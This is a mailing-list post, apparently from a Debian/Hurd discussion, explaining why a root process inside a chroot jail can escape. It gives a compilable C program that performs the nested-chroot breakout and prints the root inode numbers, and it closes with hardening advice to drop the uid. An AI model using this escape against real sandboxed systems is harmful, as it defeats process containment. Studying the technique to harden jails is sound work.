Roland McGrath <frob@debian.org> writes:
> > On most systems, I believe the easiest way of breaking a chroot jail as
> > root is:
> >
> > mkdir("whatever");
> > /* lower the roof of the jail */
> > chroot("whatever");
> > /* we are now above the roof, and can fly away */
> > chdir("../../../..");
>
> This case was previously discussed here. This circumvention works on the
> Hurd too, and it makes perfect sense that both Unix and the Hurd work this
> way. That's why chroot should always be followed by chdir("/").
Bad code can still use the above sequence to escape after the chdir.
Ready-to-compile example (dirty, without any error-checking):
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main()
{
struct stat buf;
mkdir("jail", 0700);
chroot("jail");
chdir("/");
stat("/", &buf);
printf("root inode is %ld\n", buf.st_ino);
/* end of good code, now comes code choosen by the baddie */
mkdir("xyzzy", 0700);
chroot("xyzzy");
stat("/", &buf);
printf("root inode is now %ld\n", buf.st_ino);
chroot("../../../../../../../../../..");
stat("/", &buf);
printf("root inode is now %ld, hello freedom!\n", buf.st_ino);
return 0;
}
Morale of the story: keeping a uid=0 process in a chroot jail is
moderately pointless. Give it a higher uid, too.
Something like POSIX capabilities for the Hurd would be of some
interest.
--
Robbe
Attachment:
signature.ng
Description: PGP signature